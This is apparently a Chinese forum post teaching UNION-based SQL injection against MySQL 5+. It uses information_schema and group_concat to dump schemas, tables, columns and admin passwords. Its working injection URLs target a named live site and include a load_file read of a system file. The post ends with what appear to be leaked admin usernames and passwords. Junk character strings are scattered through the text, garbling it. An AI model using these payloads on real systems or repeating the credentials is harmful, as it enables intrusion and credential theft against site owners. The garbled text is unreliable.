此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似: A+ }7 J$ h, U1 g9 A
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
: @- J- y4 F, Y8 p; O7 }7 C
" _- a2 A g' w" p& |' M% W0 I* r$ C. T. w
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
0 _4 m# r" P3 t9 F) F0 B: m' |1 m( M% f& M
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
; B( K! \0 I: [8 W. n
, D2 ]( A; A1 P2 U( S2 v; v下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
" }* s* Q) Y7 C* w- |7 s在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等1 U5 b" I9 L; H& [( F% a: Q8 Z
- X. D8 g. Z; B9 _' J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17. |1 A3 ~: G* v/ d$ G8 w) Q2 c0 |* ?
7 M: z) L/ O3 D, w( T" u5 x
读出所有库:
% v- \. o$ ~& y5 D8 [+ Whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
; b9 V, ^' c' [* F; V$ X |7 p: \5 o$ s) J% f
" ^/ E0 _( \; g3 n/ e$ U6 `, K! Q' ^# S5 N6 V1 c
读出所有表:
7 J, r" r. k* jhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
0 c: C/ ~2 `) l4 ^% n7 i/ V N. h& f1 G6 \* ~# n/ O
读出所有表字段:
* ?! x4 V$ h) z4 i Y! l V9 M4 b2 mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110). `4 T% b* O4 V$ `6 u
*/ (97,100,109,105,110)为admin的ascii码 依次类推: p7 W: d3 W9 ?5 d3 r7 L5 s
1 S7 m" v6 i# x4 V读出所有表字段里的内容:
+ F3 c% j, f8 N8 b5 ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin8 l& p7 v6 G. F* n6 x4 Y3 l. t3 r9 o
. c% W# c: l" u( j
" }# M' H8 G3 |
) X$ |" \( I% L6 w$ m
- s' A& i, p' p. H" o/ B
; t3 Y2 w2 F+ l- j4 _5 P6 U d5 e W, s# L
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%230 d$ U6 q( l+ H7 D: j3 t
7 s2 l* d( W" L/ a }
% R/ J; t1 [! j! ihttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
& G; U X4 a. n' }' _) O
7 p% g+ J- U \http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23, o* L; Z7 M$ [" D
5 @5 J7 p2 C* d* I5 [3 w: H$ h* a$ O9 ?% o( m, v2 x
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
6 m& {8 B3 U2 u3 l* n, A0 f
; B, A) ~+ g6 m+ k# R! {8 w; o7 \; K' @" u
webmaster:dzb521123,simlab:simadmin20043233! i T8 w2 z" }' k, K# G
|